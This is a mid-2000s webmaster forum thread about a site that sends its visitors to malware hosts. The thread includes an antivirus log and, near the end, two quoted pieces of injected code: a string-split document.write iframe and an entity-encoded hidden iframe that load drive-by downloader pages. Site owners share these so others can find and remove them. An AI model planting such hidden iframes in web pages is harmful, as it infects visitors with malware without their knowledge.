Sometimes, when I load my web site, I look at the status bar and I see

waiting for: http//s99.winmplayer.com/check/n404-3.php

today I saw

http//s99.msiesettings.com/check/n404-3.php

I get a virus alert, and then delete the file. My browser then crashes.

From what I understand it's malware, but I have no idea how is this trying to load...if it's a flaw on my site from a script, or if it's in my own computer. I have anti-spyware programs and don't find anything.

I go back and reload the site, keep refreshing, and it's ok. It seems to occur only on the intial launch of the site. Obvious, my concern is having visitors accuse me of spreading viruses. I don't want to give the site name here (as it will probably end up being googled with this thread). But I can pm anyone who would like to take a look.

Thanks in advance for any help

Most likely you've downloaded a bug at some stage ... to your local machine. And, it may not be getting picked up by the spyware scanner you're using. Or .. if your scanner was 'free', it may have come pre-formatted (grin).

Try a different spyware scanner or two ... even some of the on-line freebies to get a bit more of an opinion.

Sites doo get hacked ... but it's more likely at your end. Try opening a few other sites and watch the status bar for your own peace of mind. If the same behaviour occurs, then that will prove it's local.

But, these days it's imperative to have 'good' spyware scanning software as well as anti-virus and firewall. there are some really good open-source jobs out there now that are worth looking at.

Cheers,

Bob.

Run the scans with the PC in safe mode. That way they don't get a chance to load and you can delete them.

Thanks for the replies. I guess my concern is that it only tries to load when I visit my own web site - never anywhere else.

I was using PC Spyware Doctor, but I'll switch to something else in the meantime.

Try MS Defender. I've always had good luck with it.

Bob,

It is being generated from your web site, not your computer because I just saw the same msiesettings.com while loading your site.

A quick google search found this -> http://www.aquariumadvice.com/rss.php?p=823661

Have you checked your code for any reference to these sites?

Jack ... I think your'e referring to the original poster ... notset4life ... not me ????

Cheers,

Bob.

Yep, sorry about that Bob wasn't paying enough attention at the time. ;)

notset4life ... I just tried your site cybermidi.com ... and it crashed Firefox on me ... so, something going on there ... that msiesettings reference takes forever to load ... have just started up my spyware and anti-virus scanners to see if your site is propagating anything and if it slipped past my firewall. I didn't get any intrusion detection alert, though.

You should probably check the integrity of whatever third party scripts you have running on your site.

Cheers,


Bob.

This is what NOD32 detected when I went to cybermidi.com:

Time Module Object Name Threat Action User Information
6/21/2007 20:13:39 IMON file http://s99.msiesettings.com/check/n404-3.php JS/TrojanDownloader.Psyme.DH trojan Connection terminated
6/21/2007 20:13:29 AMON file D:\Temporary Internet Files\Content.IE5\G403UKZE\n404-3[1].htm JS/TrojanDownloader.Psyme.DH trojan quarantined - deleted Event occurred on a newly created file. The file was moved to quarantine. You may close this window.
6/21/2007 20:13:09 AMON file D:\Temporary Internet Files\Content.IE5\P6Y8BR82\n404-4[1].htm Win32/Exploit.MS06-006 trojan quarantined - deleted Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
6/21/2007 20:12:59 IMON file http://s99.msiesettings.com/check/n404-4.php Win32/Exploit.MS06-006 trojan Connection terminated
6/21/2007 20:12:58 IMON file http://s99.msiesettings.com/check/n404-6.php JS/Exploit.CVE-2006-1359 trojan Connection terminated

I found this:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");

In the BOOKMARK US Script I was using. So far, it looks like that was the problem.
That was referenced here: http://www.aquariumadvice.com/rss.php?p=823661 (thanks JJ)
That script was very old.

Can someone confirm that the problem appears to be gone from your end?

Thanks for all the help.

Vin

yep ... that seems to have done the trick ... at least as far as meissettings goes. cheers, Bob

Good from this end too.

I actually had something (somehow, sometime) come in and alter the code of my index page. It added this:
<iframe name="3" src="&#104&#116&#116&#112&#58&#47&#47&#115&#49&#48&#51&#46&#109&#115&#105&#101&#115&#101&#116&#116&#105&#110&#103&#115&#46&#99&#111&#109&#47&#99&#104&#101&#99&#107&#47&#118&#101&#114&#115&#105&#111&#110&#46&#112&#104&#112&#63&#116&#61&#49&#48&#51" width=1 height=1 style="display:none"></iframe>
Right before the </body> tag.

With all the ASCII codes translated, this caused every visitor to my homepage to also visit:
http://s103.msiesettings.com/check/version.php?t=103

Which is where the malware (some sort of downloader, according to Symantec) lodges itself in your Temporary Internet Files.

I have no idea where it came from or when, but it was definitely not anything I put there myself. I removed the iframe code and redeployed the index page to clear up the problem.

cheers,
Chris